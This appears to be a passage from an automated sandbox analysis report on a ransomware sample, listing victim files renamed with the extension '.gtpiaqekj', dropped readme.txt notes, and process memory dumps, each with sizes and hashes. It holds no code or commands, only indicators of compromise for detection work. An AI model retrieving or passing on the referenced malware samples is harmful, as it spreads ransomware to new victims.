                            • C:\Users\Admin\Desktop\GrantExpand.xlsm.gtpiaqekj
                              Filesize

                              232KB

                              MD5

                              04715e0d11a40736c3c3ae06ed8644cd

                              SHA1

                              b2546ad72b6924bac31e3cb2c79af6ac3b26651b

                              SHA256

                              db4a6d5ece83974cfd830b1d44a3ac9fec4d91cc7190e1880191ecbf9dd840d7

                              SHA512

                              2d5a5bad484f64999cfd00f44970c08750727ce05f4c7ae28ba9b588f878f0d8affb2a02335b7303be6a36dd1fd62b35d3f8560f9ba875838ec4ec4800f0fe5a

                              Download Submit

                            • C:\Users\Admin\Desktop\ImportStop.mov.gtpiaqekj
                              Filesize

                              201KB

                              MD5

                              8f28f64ea34edf625f7666a706033036

                              SHA1

                              88d5040e30a394806638e870b01a15087bb0c025

                              SHA256

                              5f8490d1fb75d355e6968bcd3884aef7fb2aaaae2a4455e8059aadfd884a147c

                              SHA512

                              495db8d81704e5fe540e76a1d2aaf0c2381fec25ef680af161593f1a767deffeca9f8dcc099b14842ac0aa94c5b79a4fb316fed3094232847052b182ac798279

                              Download Submit

                            • C:\Users\Admin\Desktop\MergeEnable.jpeg.gtpiaqekj
                              Filesize

                              254KB

                              MD5

                              3e12ee7e5ac404e2c5f4a86d30516546

                              SHA1

                              03e59b3486553ff3817b3636ed4e2d8c388e2b40

                              SHA256

                              278d570eeb4886007de94caa637f18ae3840182bf2a90cf961459ef73c947fe5

                              SHA512

                              3d74140293782186b95263299d1206be59c0b2a5b3beae4ec7dcb08a7597d22cab1b58e499240593737dddf61e44e2cbd05b31631dd32bdb10525c8a9e211258

                              Download Submit

                            • C:\Users\Admin\Desktop\RedoSend.vsd.gtpiaqekj
                              Filesize

                              317KB

                              MD5

                              b608800b89e3f9d0a13becd1f214fdab

                              SHA1

                              13b9508757d533dd788a1a189b9240d941376059

                              SHA256

                              4b720c44d981593b429b678fc88189fffcbf1528f1dae32bcebeb101f31768d1

                              SHA512

                              475789067857341e615503090b0c9e7e971c64af9754907f8f1c2a2061594ad7f41ea14bd76cc3788773bbb8139a4f8f984ef8df09adf73c7aafe33e976f0350

                              Download Submit

                            • C:\Users\Admin\Desktop\RestartSuspend.mpeg.gtpiaqekj
                              Filesize

                              190KB

                              MD5

                              34608a3ef15bb741e09f330d307a1021

                              SHA1

                              5b66c8b3fb483afa6ab7ed581c35aecebc0fe3af

                              SHA256

                              360bfa403c245fdf02257704d27fa8badfcfd7e2fb2ff15db89f9f0432b53bd8

                              SHA512

                              a71e123c8176b8262f5a4c5f80cc8cc01756b3ec26e9ec3da89608399594ccdc813eeb55baebe6a2a07cb8fd6aab00ab490c005d83d9adff92c406be144eea88

                              Download Submit

                            • C:\Users\Admin\Desktop\SaveResolve.xlt.gtpiaqekj
                              Filesize

                              222KB

                              MD5

                              83a5fb7f698ea4c73dd8e074710265c0

                              SHA1

                              7f9cc46d148095ee76bfb3f5ca78b026962bab00

                              SHA256

                              e7897f7b9120248afa4b16b56b3f595900c0146c42a8cc2bbe85b4c6e2f485c8

                              SHA512

                              7a1503e598de5e8e232facad551936f99af877b1cbdf2ce4c08ff1c250fc882b05fbe0237f2ebf16c35783581c207bd53748c1743b0c9947ab1151cb9a3f880f

                              Download Submit

                            • C:\Users\Admin\Desktop\TraceInstall.docm.gtpiaqekj
                              Filesize

                              116KB

                              MD5

                              8d785f44734feceddef56f6965e6bbd9

                              SHA1

                              26506303da312936441bd2d7df814d808e287481

                              SHA256

                              9cd9974c1688730de94a163821162a3ad10d7acb0fd520cd67827c69ecca0fdf

                              SHA512

                              6c028e59dee37c831bc73fee5d3e87d72886402e8aac6f1a0e7ec1ebe686e22d261e9958c2cec3714a833d41d502a10ad83182b3d0566ed2a6ae42f0fada9aeb

                              Download Submit

                            • C:\Users\Admin\Desktop\UpdateSuspend.pptm.gtpiaqekj
                              Filesize

                              243KB

                              MD5

                              73a162687ae34d8cd234cf016a6be1da

                              SHA1

                              4436920e514b870d46bf55d310fc3709bd616650

                              SHA256

                              4be9ae61b2104cc0e9434f85efaa7759af2c20f802d7852cc4640ff6e2bf9c39

                              SHA512

                              7bbba4558d0595371ed92a69f451e06c78f8867d0efa4f9554989f4936e7c752a882960333f4801044a86e2a72ba1d4660c299c7fbcb0748d2f5aa01198b1f4c

                              Download Submit

                            • C:\Users\Admin\Desktop\WaitBlock.jpg.gtpiaqekj
                              Filesize

                              275KB

                              MD5

                              d60a2e1c8e7569ef6497f51820ae0072

                              SHA1

                              818308a3810f0a5c992c2967a0003337dfc8f969

                              SHA256

                              b5ae134fc498788b7f72eb692a54c603e4bae464b35cacff137863b1145e8e0d

                              SHA512

                              df6a6d896b8712d6c3ae8b1173f162daf8d99b5fb3bbdd09d1662a1fbfd9811fde3be3ba1093fc8fea4af459da8e551c92a0db7c1f789dd92584ce54c5948ad6

                              Download Submit

                            • C:\Users\Admin\Music\ExportStep.iso
                              Filesize

                              1024KB

                              MD5

                              8e24f6c7ef92a16cf93540bd7ea31a13

                              SHA1

                              31cc03acd309772f6e42d6a445e2cb9e795a8919

                              SHA256

                              286ea9430209aa188af3872e551d01ea4b9e956c923815a572ae77ec2df8ba21

                              SHA512

                              edc559dc7519d44eacddfe001177a10c94cdc43e1a5bec6a92af779da41e1d566b556a24f0fac887453e18b680d12e9fb3205f659f5f33a93de4fbec49bf3881

                              Download Submit

                            • C:\Users\Admin\Music\ExportStep.iso
                              Filesize

                              1024KB

                              MD5

                              c8b8394fb2ca832e087dc6bfc8a2c60a

                              SHA1

                              8e6a29e45e30740a04bbc14bf9e0916a3a684ae2

                              SHA256

                              44ea803774db9b2355810515ad5a23242d701f705bf7c2fa1003b7a9985bc5c7

                              SHA512

                              7cf75604a82bb40184fc4e09788daf5672c0ba0ad296123525f7b1ec3081fc31615b364054221b9f82d0466df861da03af641813cb18d536c2e8aec2b3ebe0b6

                              Download Submit

                            • C:\Users\Admin\Music\readme.txt
                              Filesize

                              1KB

                              MD5

                              137fb36aa88d3e2cd0e0619b356e606c

                              SHA1

                              652a00abfee507f25e32e7aabcf15a7d12d25998

                              SHA256

                              18dc690d8e2099c2fe29ad6f620dc05a3c489d5fefee533dfd31581e5408e175

                              SHA512

                              81a21b895502d7a1b2a19f86a72bf72d88458cd921a1b10f109208c3a0195d23665e5384f9370620e77b8a958def96775ba59596345df4183383b141ccea9fbf

                              Download Submit

                            • C:\Users\Admin\Pictures\readme.txt婍
                              Filesize

                              1KB

                              MD5

                              d79919dc056e1c3c0eb069f03c8f56ec

                              SHA1

                              e695e4fa244dcf5bdd4eb0ed7ab7227b723d3bb0

                              SHA256

                              4cc0f3949f86925f482717f7072de545f9483bc7fd01ba850947161a1048c534

                              SHA512

                              a85e2f6f62956c430c818e7e344f50ac6312609c117f21960b47aa61d0107a69a81853400499384e16aa3fe092918b224da86a16ff94748f90c31d6394174dcb

                              Download Submit

                            • memory/1144-12-0x0000000001D20000-0x0000000001D25000-memory.dmp

                              Filesize

                              20KB

                              Download

                            • memory/1236-15-0x00000000001A0000-0x00000000001A5000-memory.dmp

                              Filesize

                              20KB

                              Download

                            • memory/1964-1-0x0000000000110000-0x0000000000111000-memory.dmp

                              Filesize

                              4KB

                              Download

                            • memory/1964-17-0x0000000003EA0000-0x0000000003EA1000-memory.dmp

                              Filesize

                              4KB

                              Download

                            • memory/1964-0-0x0000000001C90000-0x0000000001F24000-memory.dmp

                              Filesize

                              2.6MB

                              Download

                            • memory/1964-2-0x0000000000420000-0x0000000000421000-memory.dmp

                              Filesize

                              4KB

                              Download

                            • memory/1964-3-0x0000000000430000-0x0000000000431000-memory.dmp

                              Filesize

                              4KB

                              Download

                            • memory/1964-5-0x0000000000450000-0x0000000000451000-memory.dmp

                              Filesize

                              4KB

                              Download

                            • memory/1964-6-0x0000000000460000-0x0000000000461000-memory.dmp

                              Filesize

                              4KB

                              Download

                            • memory/1964-7-0x0000000000470000-0x0000000000471000-memory.dmp

                              Filesize

                              4KB

                              Download

                            • memory/1964-8-0x00000000004B0000-0x00000000004B1000-memory.dmp

                              Filesize

                              4KB

                              Download

                            • memory/1964-9-0x00000000004C0000-0x00000000004C1000-memory.dmp

                              Filesize

                              4KB

                              Download

                            • memory/1964-10-0x00000000004D0000-0x00000000004D1000-memory.dmp

                              Filesize

                              4KB

                              Download

                            • memory/1964-11-0x00000000004E0000-0x00000000004E1000-memory.dmp

                              Filesize

                              4KB

                              Download

                            • memory/1964-4-0x0000000000440000-0x0000000000441000-memory.dmp

                              Filesize

                              4KB

                              Download